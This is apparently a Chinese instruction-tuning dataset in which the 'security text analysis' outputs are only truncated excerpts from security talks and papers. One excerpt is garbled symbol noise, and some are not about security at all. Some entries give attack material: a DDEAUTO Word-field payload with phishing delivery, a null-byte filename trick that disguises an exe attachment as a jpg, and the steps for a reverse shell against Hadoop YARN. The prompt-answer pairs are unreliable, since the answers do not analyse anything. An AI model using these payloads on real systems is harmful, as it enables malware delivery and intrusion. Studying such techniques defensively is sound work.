{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n物 联 网 资 产 变 化 研 究 演 讲 人  桑 鸿 庆 绿 盟 科 技 资 深 安 全 研 究 员 2019 PART 01 简介 目录 CONTENTS PART 02 IPv4地址变化 PART 03 分析 PART 04 IPv6地址变化 01 02 03 04 PART 05 影响与建议 05 PART 01 网 络 空 间 引 擎 与 物 联 网 资 产 识 别 简 介 唐人街探案2中片段 挪威 Finse 1222酒店 图片来源于网络 网 络 空 间 搜 索 引 擎 物 联 网 资 产 暴 露 概 况 资产 协议探测 Banner 设备识别 Label 41,791 993,445 4,752,926 4,239,729 473,501 1,319,448 21,252,312 27,957,765 0 5,000,000 10,000,000 15,000,000 20,000,000 25,000,000 30,000,000 打印机 VoIP电话 摄像头 路由器 设备类型 全球 中国 全 球 和 国 内 物 联 网 相 关 设 备 暴 露 概 况  2 0 1 8 全 年 数 据  资 产 发 现 过 程 DrDoS Mirai变种仍然在活跃的发动攻击 利用路由器和摄像头的反射攻击事件飙升 图片来源于网络 搜索到的物联网设备服务已不在 发现的威胁情报不存活 暴 露 数 量 真 的 是 这 样 的 吗  一 起 攻 击 事 件 感 染 范 围 真 有 这 么 大  为什么大量服务威胁情报不存活 国 内 物 联 网 资 产 I P v 4 网 络 地 址 变 化 情 况 PART 02 4,235,111 1,426,008 1,063,759 563,572 388,107 241,767 234,353 163,282 145,665 130,433 0 500,000 1,000,000 1,500,000 2,000,000 2,500,000 3,000,000 3,500,000 4,000,000 4,500,000 554 80 5060 22 21 443 23 8080 8081 81 暴露资产个 端口号 Others RTSP SIP UPnP  物联网 互联网 70% HTTP HTTPS SSH Telnet FTP 30% 国 内 物 联 网 资 产 暴 露 的 端 口 及 协 议 分 布 情 况 国内暴露的物联网资产协议分布情况 基 于 多 轮 扫 描 结 果 对 比 的 资 产 变 化 研 究 方 法 第1轮 (基准轮次) 第2轮 第3轮 (对比轮次) 第n轮 (对比轮次) 扫描开始 扫描结束 扫描开始 扫描时长 第4轮 第5轮 (对比轮次) 对比间隔时间 扫描结束 18,878 15,355 18,534 14,105 29,920 33,447 30,263 34,688 26,960 24,557 27,793 26,076 0 5,000 10,000 15,000 20,000 25,000 30,000 35,000 40,000 间隔6天 间隔34天 间隔49天 间隔74天 暴露资产个 对比时间 无变化 消失资产 新出现资产 两次对比类 型没有发生 变化的数量 相对于基准 消失的资产 数量 相对于基准 新增的资产 数量 路 由 器 变 化 情 况 8 0 端 口 路 由 器 Ø 平 均 扫 描 周 期 3 天 Ø 总 量 约 5 万 u 变 化 的 资 产 数 量 相 对 稳 定  约 有 3 . 3 万 路 由 器 网 络 地 址 发 生 过 变 化  约 占 总 量 的 6 8 % 40,021 35,195 34,162 28,370 141,984 146,810 151,282 153,635 156,634 167,817 167,917 184,164 0 50,000 100,000 150,000 200,000 间隔16天 间隔28天 间隔40天 间隔64天 暴露资产个 对比时间 无变化 消失资产 新出现资产 VoIP电 话 变 化 情 况 5 0 6 0 端 口 Vo I P 电 话 Ø 平均扫描周期3天 Ø 总量约18万 u 变化的资产数量相对稳定 约有 15万VoIP电话网络地址发生过变 化大约占总资产量的80% 摄 像 头 变 化 情 况 356,042 327,989 308,393 303,499 123,192 151,245 170,841 175,735 127,975 156,589 177,893 185,131 0 50,000 100,000 150,000 200,000 250,000 300,000 350,0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBoomstick-Fu Physical Security at its Most Basic and Brutal Level DefCon 15 Deviant Ollam | Noid | Thorn | Jur1st Show Of Hands  Gun Owners  Regular Shooters  Used a Firearm Defensively  Considering a Purchase What This Talk Is About (and what its NOT about)  Defensive Firearm Ownership  Hardware Within the Law (sorry full auto modders)  People Within the Law (permits and licenses, i.e. CCW) Four Rules of Firearm Safety 1. Always treat a weapon as loaded 2. Never point in a direction you wouldnt fire 3. Be aware of your target and what is beyond 4. Finger off the trigger until ready to shoot Whats wrong with this picture? Why Choose To Own Guns?  Its not about Bad Neighborhoods  Hope for the Best & Prepare for the Worst  The worst can get pretty bad on some very rare occasions, no matter where you live (Natural Disasters, Civil Unrest, Mass Hysteria, etc.)  The most restrictive regions (or nations) can have some of the worst violent crime rates. We Will Discuss  Weapon Selection  Ammo Selection  Training and Practice  Psychological Considerations  Legal Notes Weapon Selection  Rifles vs. Shotgun vs. Handgun  Rifles are almost completely off the list Weapon Selection  Rifles vs. Shotgun vs. Handgun  Rifles are almost completely off the list  Shotguns  Actions, Pros & Cons, Versatility, Reliability  Handguns  Actions, Pros & Cons, Versatility, Reliability Shotguns  Pump vs. Autoloading vs. Old Style hard to top a good pump action (Remington 870 or Mossberg 500/590) Shotguns  Pump vs. Autoloading vs. Old Style  Capacity, Versatility, Ease of Use, Handling  Storing Safely & Storing Ready  Accessories (slings, lights, sidesaddles) Handguns  Revolver vs. Autoloading Pistol Handguns  Revolver vs. Autoloading Pistol  Revolver  Reliable & Simple  Storing Ready  Pistol  More Rounds  Faster Reloads Maintenance  No matter what you choose, it will only perform properly if you take care of it  Cleaning after every use  Smithing by professionals  Proper storage Ammunition  Caliber", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMASTER THESIS Thesis submitted in partial fulfillment of the requirements for the degree of Master of Science in Engineering at the University of Applied Sciences Technikum Wien  Degree Program IT-Security Variation analysis of exploitable browser vulnerabilities By: René Freingruber, BSc Student number: 1810303034 Supervisors: 1. Supervisor: Dipl.-Ing. (FH) Mag. DI Christian Kaufmann 2. Supervisor: Patrick Wollgast, MSc Vienna, 2020-09-13 Declaration As author and creator of this work to hand, I confirm with my signature knowledge of the relevant copyright regulations governed by higher education acts (see Urheberrechtsgesetz /Austrian copyright law as amended as well as the Statute on Studies Act Provisions / Examination Regulations of the UAS Technikum Wien as amended). I hereby declare that I completed the present work independently and that any ideas, whether written by others or by myself, have been fully sourced and referenced. I am aware of any consequences I may face on the part of the degree program director if there should be evidence of missing autonomy and independence or evidence of any intent to fraudulently achieve a pass mark for this work (see Statute on Studies Act Provisions / Examination Regulations of the UAS Technikum Wien as amended). I further declare that up to this date I have not published the work to hand nor have I presented it to another examination board in the same or similar form. I affirm that the version submitted matches the version in the upload tool. Place, Date Signature 3 Kurzfassung Web Browser zählen zu den am häufigsten verwendeten Programmen auf Computern und Smartphones. Sie stellen daher ein attraktives Angriffsziel für staatliche Akteure und finanziell motivierte Hacker dar. Obwohl marktführende Browser eine Vielzahl an modernen Schutzmaßnahmen implementieren, kann regelmäßig demonstriert werden, dass Schwachstellen dennoch ausgenutzt und Systeme von Opfern, ohne deren Wissen, übernommen werden können. Hersteller wie G", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXIII / I / MMIII DefCon XI Bluesniff - The Next Wardriving Frontier Bruce Potter <gdead@shmoo.com> Brian Caswell <bmc@shmoo.com> XIII / I / MMIII DefCon XI Bluetooth Basics  NOT 802.11! NOT a relative of 802.11!  Cable replacement technology  Low power for embedded devices  More BT radios than 802.11 radios in existence  Phones, headsets, laptops, mice, keyboards  Master / Slave architecture XIII / I / MMIII DefCon XI Bluetooth Protocol  Uses 2.4 GHz ISM band, same as 802.11b/g  Generally low power  Class 3 (1mW) for most devices  Some Class 1(100mW) devices exist  Frequency Hopping Spread Spectrum  Uses a pre-defined hopping pattern  Back in the day, FHSS was a security mechanism  Resists interference  1MHz wide, hopping every 625 microseconds XIII / I / MMIII DefCon XI Bluetooth Protocol  A real disaster of a protocol stack  Heck, the core spec is 1024 pages.. Good reading!  Specifies from Layer 1 to Layer 7  High points  RF-level sync  Inquiry/request  Service discovery  Low power modes XIII / I / MMIII DefCon XI Bluetooth Security  Pairing  Using a shared secret (PIN), exchange random number to form key  Key used to derive session key for future comms  Used for Trusted <-> Trusted comms XIII / I / MMIII DefCon XI Bluetooth Security  Authentication / Authorization  Per connection AA  Per service AA  Encryption  Ditto  Its all OPTIONAL!  Left to the developer/user to decide  This ends well :( XIII / I / MMIII DefCon XI Bluetooth Profiles  Profiles exist to ease interoperability *wink* *wink*  Keyboard, file transfer, handsfree (and headset), etc XIII / I / MMIII DefCon XI Bluetooth vs. 802.11b  More at stake  Compromise 802.11 security = Access to network  Compromise BT Security = Gateway directly to App level functionality  More personalized information  Phone conversations, calendar info, etc  Less interesting for Joe 12-pack, more interesting for executives XIII / I / MMIII DefCon XI Discovery of 802.11  Direct Sequence Spread spectrum  Transmitters always in t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHP Security Research Zero Day Initiative Java Every-Days Exploiting Software Running on 3 Billion Devices Brian Gorenc Manager, Vulnerability Research Jasiel Spelman Security Researcher HPs Zero Day Initiative would like to thank the following researchers for their submissions over the last three years: Alin Rad Pop Chris Ries Aniway.Anyway@gmail.com James Forshaw Anonymous Joshua J. Drake Anonymous Michael Schierl Anonymous Peter Vreugdenhil axtaxt Sami Koivu Ben Murphy Vitaliy Toropov VUPEN Security Also, we would like to thank the following people for providing additional information in support of this paper. Mario Vuksan of Reversing Labs Adam Gowdiak of Security Explorations Java Every-Days: Exploiting Software Running on 3 Billion Devices Introduction HPs Zero Day Initiative (ZDI), the worlds largest vendor agnostic bug bounty program, experienced a surge in submissions for Oracles Java platform in late 2012 and early 2013. It became a fairly regular occurrence for several new 0-day Java vulnerabilities to show up in the queue over a seven-day span. One of the more interesting trends revealed that ZDI researchers were not going after a single vulnerability class. At the time, the industry focused on sandbox bypasses and cases were arriving into the ZDI that took advantage of that weakness, but submissions identifying memory corruption vulnerabilities were still just as common. This prompted the following questions:  What is truly the most common vulnerability type in Java?  What part of the architecture has had the most vulnerabilities reported against it?  What part of the architecture produces the most severe vulnerabilities?  How the vulnerabilities being used in the threat landscape map to the ZDI submissions?  How is Oracle responding to this increased pressure? These questions continued to be discussed internally when exploit kit authors began including several new Java vulnerabilities during the first months of 2013. The targeted attacks against large s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChatGPT技术分析 刘群 LIU Qun 华为诺亚方舟实验室 Huawei Noahs Ark Lab 在线讲座 (an online lecture) 2023-02-16 ChatGPT概览 ChatGPT的出色表现 ChatGPT的关键技术 ChatGPT的不足之处 ChatGPT未来发展方向 Content ChatGPT概览 ChatGPT的出色表现 ChatGPT的关键技术 ChatGPT的不足之处 ChatGPT未来发展方向 Content ChatGPT轰动效应  用户数5天100万2个月达到1亿  所有人都开始讨论ChatGPT传播速度堪比 新冠病毒  Google内部拉响红色警报  Google紧急仅仅发布Bard但因发布现场出 现错误导致股票蒸发8%  微软追加投资OpenAI一百亿美元  微软迅速推出加载了ChatGPT的New Bing 并计划将ChatGPT接入Office套件  国内外大厂迅速跟进 1 total: 40 ChatGPT官方博客简介 ChatGPT: Optimizing Language Models for Dialogue Weve trained a model called ChatGPT which interacts in a conversational way. The dialogue format makes it possible for ChatGPT to answer followup questions, admit its mistakes, challenge incorrect premises, and reject inappropriate requests. ChatGPT is a sibling model to InstructGPT, which is trained to follow an instruction in a prompt and provide a detailed response. November 30, 2022 13 minute read We are excited to introduce ChatGPT to get users feedback and learn about its strengths and weaknesses. During the research preview, usage of ChatGPT is free. Try it now at chat.openai.com. We are excited to introduce ChatGPT to get users feedback and learn about its strengths and weaknesses. During the research preview, usage of ChatGPT is free. Try it now at chat.openai.com. TRY CHATGPT  ChatGPT Blog: https://openai.com/blog/chatgpt/ 2 (1) total: 40 ChatGPT官方博客简介 The main features of ChatGPT highlighted in the official blog:  answer followup questions  admit its mistakes  challenge incorrect premises  reject inappropriate requests ChatGPT Blog: https://openai.com/blog/chatgpt/ 2 (2) total: 40 ChatGPT模型大小 ChatGPT是基于GPT-3的Davinci-3模型开发的 3 (1) total: 40 ChatGPT模型大小 GPT-3论文中提供了一下不同规模的版本 OpenAI对外提供的API提供了以下4个模型 3 (2) total: 40 ChatGPT模型大小 根据数据对比Davinci模型应该对应于最大175B的GPT-3模型 On the Sizes of OpenAI API Models Using eval harness, we can deduce the sizes of OpenAI API models from their performance. May 24, 2021  Leo Gao OpenAI hasnt officially said anything about their API model sizes, whi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## JSON ### 简介 - JavaScript 对象表示法JavaScript Object Notation - 存储和交换文本信息的语法类似 XML - 比 XML 更小更快更易解析 ### Json语法 ```js var jsonObject= { propertyName(属性名):value(值), //对象内的属性语法属性名与属性值是成对出现的 functionName(函数名):fucntion(){.......} //对象内的函数语法函数名与函数内容是成对出现的 } ``` - 数据在名称/值对中 `\"\":\"\"` - 数据由逗号分隔 `\"\":\"\",\"\":\"\"` - 花括号保存对象 `{}` - 方括号保存数组 `[{},{}]` ### Json 方法 `JSON.stringify`把JS对象转化为JSON对象 ```js let obj1 = { name:'qiu', age:24 } let obj2 = [ {name:'liu',age:24}, {name:'zhang',age:55} ] let obj = JSON.stringify(obj2) console.log(typeof obj,obj) //typeof 数据类型检测 ``` **注意**json是一个字符串 `JSON.parse`把JSON字符串转换为对象 ```js let jso = '{\"employees\": [{ \"firstName\":\"Bill\" , \"lastName\":\"Gates\" },{ \"firstName\":\"George\" , \"lastName\":\"Bush\" },{ \"firstName\":\"Thomas\" , \"lastName\":\"Carter\" }]}' let json = JSON.parse(jso) console.log(typeof json,json) ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! \" #$ % &''& ( #) * + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * &,) &''& * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ( - + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ) # ( # ! \" # $ % % &\" $ ' # ! % % ( % % ) ! % ! * + * , - \" + ./ . 0 1 2 \" ! % + 3 4 5 6 44 # 7 6 4 . - 4 43 , \" , 4 4 0 4 48 + 5!9 4 4: , \" + 4 4; $ ) % 48 , 46 3 4< 34 = 4< 3 5 . 33 3 3 + : 4 : & : 3 + ; 8 5 3 84 3 8 3 83 + 34 8 ' 34 : = 33 8 !4 , > ! ( % ! >! ( < ! , - ' 46 !3 % 4 ! < !8 , ' ? * 43 4 3 !: , 3 : 4 = * 4: 88 ! ; @ , % 9 , % \" ? % A 0 % , % '! 9 , 5 % % \" 5 % % , -B . % ! ' % 5 ! % ! \" = 44 % C- ,1<<D % E F .\" % % ! % ? A 5 ! 5 5 ! 6 Visible Watermarking Covert Channels Steganography Anonymity Copyright Marking Information Hiding Linguistic Steganography Technical Steganography Robust marking Fragile marking Fingerprinting Watermarking Imperceptible Watermarking = !4* , > ( % > ( ' 5 % % \" ) % \" # \" / / 5 % \" ' ' ' 5 ' \" % \" Æ , % % \" C1-<<D % B \" C- ,1<6 ,-D % \" % \" < , % * ! & ! % + ! $ CG$<6 D C<6D % \" ! % \" 0 % Æ ' C1-D ) E) @ F C,-<6D % \" % % % % % \" % % % 9 ' % % % % % % ' \" $ % 5- % ' % ( C6 D 5 , 9 4 # % % # % % \" % % % ! \" % 5 0 # \" # -BC#-<<D 0 \" H \" % ! % \" % ? % A % I \" , ' \" % % \" \" B 5 \" H \" \" \" % B % 0 % % ' B % ) ! % % ) ' 2! , \" H \" % ! J \" 5 \" 5 \" \" % % % ! ' \" 44 % \" \" \"C- ,1<6 ,-D % \" % \" % ) 5 % % ! ! \" , C<6D B ? \"A 5 \" % & 5 \" % \" ? A Æ ) ! 0 % \" % % 1 / ( ! % \" 2 % ' 1( E \" FC1:; D % \" % ! ) ' % \" K \" \" ' 5 \" % ' \" , # 4 # 5 5 % B \" ) 0 , - % 0 % % !! % , 0 \" 0 % % , % ( 5 ' ( ? % % A % J + ! ' % ! % C#-<< = .4 D % , \" % % % ! ' 5 # # 5 5 % \" ! 5 E= F % E= F % E5 = 7F ' % 5 % % % % 43 \" # $%&' , C D CGD C D % 0 % \" % C#-<< = .4 D , % \" = ) C-4D ! \" % % ) , % % =8 C# 4 D ( # % ' % ! % 5 % / % C#-<< = .4 -0D 5 ' Æ ! ' % \" % ! ? A 5 4<<6", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hadoop YARN ResourceManager 未授权访问 ## 原理 参考 http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf ## 测试环境 运行测试环境 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8088`即可看到Hadoop YARN ResourceManager WebUI页面 ## 利用 利用方法和原理中有一些不同在没有 hadoop client 的情况下直接通过 REST API (https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html) 也可以提交任务执行 利用过程如下 1. 在本地监听等待反弹 shell 连接 1. 调用 New Application API 创建 Application 1. 调用 Submit Application API 提交 参考 [exp 脚本](exploit.py)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAm I Being Spied On? Low-tech Ways Of Detecting High-tech Surveillance Dr. Phil @ppolstra http://philpolstra.com What this talk is about  Determining if you are a victim of spying  Video surveillance  Tailing  Audio eavesdropping  Devices embedded in your computer, tablet, or smart phone Why you should care  Government assault on Constitution is well known  Local governments  Competitors  Stalkers  People who just don't like you Video surveillance Common flaw all night vision cameras share Detecting this flaw with any digital camera Finding a camera with a phone Other Ways to Detect IR Detecting wireless cameras Free way: Android tablet or smartphone (ad hoc nets) Inexpensive way: BeagleBone based system Simple way using Airodump-ng Slightly more sophisticated with Python #!/usr/bin/env python from scapy.all import * import os, sys, time, operator interface = \"mon0\" clientsIKnow = { } def sniffClientStrength(p): if p.haslayer(RadioTap) and p.haslayer(Dot11): try: sigStrength = int(-(256-ord(p.notdecoded[-4:-3]))) if str(p.addr2) not in clientsIKnow.keys(): clientsIKnow[str(p.addr2)] = sigStrength else: if sigStrength > clientsIKnow[str(p.addr2)]: clientsIKnow[str(p.addr2)] = sigStrength except KeyboardInterrupt: sys.exit(1) except: pass def main(): os.system('clear') try: while True: sniff(iface=interface, prn=sniffClientStrength, timeout=2) if clientsIKnow: sorted_list = sorted(clientsIKnow.items(), key=lambda x: x[1], reverse=True) for item in sorted_list: print item[0], item[1] time.sleep(1) os.system('clear') clientsIKnow.clear() sorted_list = [] except KeyboardInterrupt: pass if __name__ == '__main__': main() More sophisticated Way Moderately expensive way: Detecting signals in licensed bands  Use an Linear Technologies LTC5582 RMS RF power detector  Measure LTC5582 output on volt meter or BeagleBone or ??  Bandpass filters can be used to look at individual frequency bands Moderately Expensive Way Moderately Expensive Way Physical surveillance  Tailing  Common ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAirPods客户端异构附件名分析 前 嘶吼发了篇业资讯 https://www.4hou.com/posts/jJAP 提到AirPods客户端特定附件 名显示不正确问题攻击者可以让客户端对异常构造的附件名称显示不正确这种不正确显示会导 致客户端户误打开恶意附件内容 中也提到影响版本AirPods客户端3.0.5以上含3.1.0.303不含以下版本 所以我们就根据披露的这点字信息来分析下该问题吧 漏洞分析 在下载站找到了个历史版本的安装包cmclient_3.0.7-155_amd64.exe安装下即可 根据已有信息我们先要明怎样的件名会让户端打开触发我们构建份带附件的邮 件导出为eml件 这附件使的是jpg格式客户端打开eml件发现附件双击是可以直接打开的并没有任何 的提示 那我们再换成exe件看看是否有这个功能 如下图所示当附件为exe件时则没有双击可以直接打开的功能变成了双击另存为 所以根据资讯信息我们致能猜到该问题的向是出在了filename这个部分也就是通过构建让 客户端显示为jpg件也就有了双击打开的功能实际打开的件则是exe 那么这其实就跟Web件上传样在件名处去构建NTFS件流各种符号都尝试下 发现不 并且使URL编码的式发客户端并不会去解码 那么顺着编码看下去歌 content-disposition filename url encoding 顺着找到篇 章https://stackoverflow.com/questions/93551/how-to-encode-the-filename-parameter-of- content-disposition-header-in-http 提到返回给浏览器的响应头中可以将原先的 filename=value 字段变为 filename*=utf- 8''value 格式前者value编码是不会解码的后者value浏览器是会动解码的 并且这个格式是RFC 6266标准中提到的https://datatracker.ietf.org/doc/html/rfc6266#section- 4.1 在4.3节 https://datatracker.ietf.org/doc/html/rfc6266#section-4.3 也提到两者的区别就是编 码的持 编码的规范定义在RFC 5987中也有对应的示 例https://datatracker.ietf.org/doc/html/rfc5987#section-3.2.2 所以最终我们可以理出这样的格式其中括号包裹起来的就是可选项 同理AirPods客户端本质上就是个浏览器所以我们构建如下的件字段内容 打开该邮件客户端显示为jpg附件 key*=[charset_encode]'[language]'value 1 Content-disposition: attachment; filename*=''123.exe%00123.jpg 1 但是双击打开却是以exe形式并且我们通过ProcessHacker可以看到件的路径 它是以exe形式存储 在 C:\\Users\\xxx\\AppData\\Roaming\\Cm\\CMClient\\temp\\noview\\acc_0\\mail_1658895394\\attach\\123.ex e 录下 路径梳理 简单总结梳理下路径 1. 邮件查看附件以图形式显示解码 2. 双击附件附件会转储到 Cm\\CMClient\\temp\\noview 录下但是由于00截断所以只保存了 前半部分 3. CreateProcessW打开指定件进程 触发问题 传该问题可以动触发不需要双击附件我在分析过程中并没有发现这样的功能但是在版 本的客户端内发现了有类似Webview的功能没有具体分析如果可以动触发的话概率是 Webview渲染的时候动打开了件file协议家有什么新的想法欢迎补充", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWEAPONIZING THE BBC MICRO:BIT DAMIEN \" \" CAUQUIL VIRTUALABS DEF CON 25 - JULY 28, 2017 /ME Head of R&D, Econocom Digital Security Senior security researcher HW/SW Reverse-engineer AGENDA BBC Micro:Bit Features & Capabilities Hacking ideas Hacking into the Micro:Bit Turning the Micro:Bit into a sniffer Hacking various 2.4GHz protocols Demos Wireless keylogger Quadcopter hijacking Radiobit BBC MICRO:BIT FEATURES 5x5 LED matrix 2 buttons Custom expansion connector Wireless capabilities MicroPython ! $15 HARDWARE SPECIFICATIONS nRF51822: 2.4 GHz GFSK transceiver 256 KB Flash 16 KB RAM 6 ADCs SPI bus I2C bus 20 GPIO 3V powered (2 x AAA) EASY TO PROGRAM READ EVALUATE PRINT LOOP $ minicom -D /dev/ttyACM0 -b 115200 MicroPython v1.7-9-gbe020eb on 2016-04-18; micro:bit with nRF51822 Type \"help()\" for more information. >>> help() Welcome to MicroPython on the micro:bit! Try these commands: display.scroll('Hello') running_time() sleep(1000) button_a.is_pressed() [...] WIRELESS CAPABILITIES Legacy ShockBurst Protocol (SB) Enhanced ShockBurst Protocol (ESB) Bluetooth Low Energy (BLE) ENHANCED SHOCKBURST PROTOCOL Designed by Nordic Semiconductor Used by various wireless mice and keyboards Attacked by Marc Newlin during DEF CON 24 BASTILLE VS. KEYBOARDS/MICE MouseJack framework Great tool to sniff/attack keyboards and mice Open source Written in Python http://www.mousejack.com/ GOODSPEED VS. NRF24L01+ Travis Goodspeed managed to turn it into a sniffer source: Travis' blog SAMY KAMKAR'S KEYSWEEPER http://samy.pl/keysweeper/ DSMX HIJACKING TOOL source: The Register (extract from the FireFly example code) OFFENSIVE PYTHON ? # Event loop. while True: if button_a.was_pressed(): radio.send('flash') # a-ha incoming = radio.receive() if incoming == 'flash': sleep(random.randint(50, 350)) display.show(flash, delay=100, wait=False) if random.randint(0, 9) == 0: sleep(500)s radio.send('flash') # a-ha HACKING INTO THE MICRO:BIT PROMISCUITY IS THE NRF51822'S DUTY (TOO) (or how I ported Goodspeed's", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n第 1页 共 12页 SDL-软件安全设计初窥  safer applications begin with secure design  Cryin@insight-labs.org 摘要本文详细介绍微软软件安全开发生命周期SDL相关概念并讨论要遵循 SDL 过 程所应执行的各种安全活动其中着重对软件安全设计的原则进行探讨并对 STRIDE 威胁 建模方法进行深入介绍 安全开发生命周期SDL是一个帮助开发人员构建更安全的软件和解决安全合规要求 的同时降低开发成本的软件开发过程 安全应用从安全设计开始软件的安全问题很大一 部分是由于不安全的设计而引入的微软用多年的经验总结出了安全开发生命周期SDL 并提出了攻击面最小化STRIDE 威胁建模等多种方法辅助安全人员对软件进行安全设计 安全设计对于软件安全的重要性尤为可见 第 2页 共 12页 一. 前言 1.1 SDL 介绍 安全开发生命周期SDL即 Security Development Lifecycle是一个帮助开发人员 构建更安全的软件和解决安全合规要求的同时降低开发成本的软件开发过程 自 2004 年 起微软将 SDL 作为全公司的计划和强制政策SDL 的核心理念就是将安全考虑集成在软件 开发的每一个阶段:需求分析设计编码测试和维护从需求设计到发布产品的每一 个阶段每都增加了相应的安全活动以减少软件中漏洞的数量并将安全缺陷降低到最小程 度安全开发生命周期 (SDL)1 是侧重于软件开发的安全保证过程旨在开发出安全的软件 应用 1.2 SDL 安全活动 简单来说SDL 是微软提出的从安全角度指导软件开发过程的管理模式在传统软件开 发生命周期 (SDLC) 的各个阶段增加了一些必要的安全活动软件开发的不同阶段所执行的 安全活动也不同每个活动就算单独执行也都能对软件安全起到一定作用当然缺少特定的 安全活动也会对软件的安全性带来影响 图 1微软 SDL 安全活动简图 我曾今有幸参加过微软安全专家 Michael Howard 及 Taha Mir 关于 SDL 及威胁建模的培 训作为软件安全开发生命周期一书的作者Michael Howard 不只一次强调安全培 训是 SDL 最核心的概念软件是由设计人员设计代码是有开发人员编写同样大部分软 件本身的安全漏洞也是由设计及编码人员引入所以对软件开发过程中的技术人员进行安全 培训这点至关重要 1 https://www.microsoft.com/en-us/SDL/process/design.aspx 第 3页 共 12页 可以看到在整个 SDL 周期中除了安全培训这项活动还在软件发布后增加了安全应急 响应的相关活动而目前国内大多数公司目前已经基本上具备了安全应急响应的活动和职能 部门同时包括安全编码规范代码审计渗透测试等安全活动也都已经基本具备甚至个别 企业已经比较成熟但在软件设计阶段的安全活动则相对较少据我了解仅个别大型跨国企 业才拥有安全设计等相关的安全活动而根据微软多年的实践和经验软件的安全问题很大 一部分是由于不安全的设计而引入的在设计阶段造成的安全缺陷在后期修复的成本和时间 都相对较高STRIDE 威胁建模的创始人之一 Taha Mir 曾说过safer applications begin with secure design即安全应用从安全设计开始相应的微软 SDL 也提出了若干核心的 安全设计原则并提出了如攻击面最小化STRIDE 威胁建模等多种方法辅助安全人员对软 件进行安全设计本文就针对当前国内企业在软件设计阶段安全活动发展相对欠缺的安全设 计进行探讨 二. 安全设计核心原则 SDL 安全设计核心原则:  Attack Surface Reduction攻击面最小化  Basic Privacy: 基本隐私  Least Privilege: 权限最小化  Secure Defaults: 默认安全  Defense in Depth纵深防御  Threat Modeling威胁建模 2.1 攻击面最小化 攻击面是指程序任何能被用户或者其它程序所访问到的部分这些暴露给用 户的地方往往也是最可能被恶意攻击者攻击的地方 攻击面最小化即是指尽量减少暴露恶意用户可能发现并试图利用的攻击面 数量软件产品的受攻击面是一个混合体不仅包括代码接口服务也包括 对所有用户提供服务的协议尤其是那些未被验证或者远程的用户都可以访问到 第 4页 共 12页 的协议安全人员在攻击面最小化时首先要对攻击面进行分析攻击面分析就是 枚举所有访问入库接口协议一剂可执行代码的过程从高层次来说攻击面 分析着重于:  降低默认执行的代码量  限制可访问到代码的人员范围  限定可访问到代码的人员身份  降低代码执行所需权限 常见的攻击面分析技巧如下表", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1559-002-win-利用进程间通信执行-动态数据交换-DDE ## 来自ATT&CK的描述 攻击者可以使用Windows动态数据交换DDE执行任意命令DDE是一种客户端-服务器协议用于应用程序之间的一次性或连续的进程间通信IPC建立链接后应用程序可以自动处理由字符串温数据链接数据项更改时的通知热数据链接数据项更改的复制以及命令执行请求组成的事务 对象链接和嵌入OLE或在文档之间链接数据的功能最初是通过DDE实现的尽管已被组件对象模型取代但可以通过注册表项在Windows 10和大多数Microsoft Office 2016中启用DDE Microsoft Office文档可能会被直接或通过嵌入式文件的方式注入DDE命令并被用于通过网络钓鱼或托管的Web内容投递恶意代码从而避免使用Visual Basic for ApplicationsVBA宏在无法直接访问命令和脚本解释器的受感染计算机上攻击者也可以利用DDE执行操作 ## 测试案例 DDE是一种动态数据交换机制Dynamic Data ExchangeDDE使用DDE通讯需要两个Windows应用程序其中一个作为服务器处理信息另外一个作为客户机从服务器获得信息客户机应用程序向当前所激活的服务器应用程序发送一条消息请求信息服务器应用程序根据该信息作出应答从而实现两个程序之间的数据交换 ### 制作恶意DDE文档 创建一个文档dde.docx之后双击打开 dde.docx直接Ctrl + f9快捷键便可以快速帮助创建一个域我们则只需要在花括号中添加如下指令(弹出一个计算器)实战过程中可以远程加载我们的木马 ``` DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe \"\\/k calc.exe\" ``` ### 通过钓鱼等方式传播恶意文件 目标点击后会弹窗提示成功执行代码弹出计算器. ## 检测日志 无 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ### 建议 在OLE和Office开放的XML文件中扫描DDEAUTODDE关键字这是DDE执行的标识 监控进程是否存在指示DDE滥用的异常行为例如Microsoft Office应用程序正在加载一些通常无关于程序的DLL和其它模块或者这些应用程序创建了一些不寻常的子进程如 cmd.exe ## 参考推荐 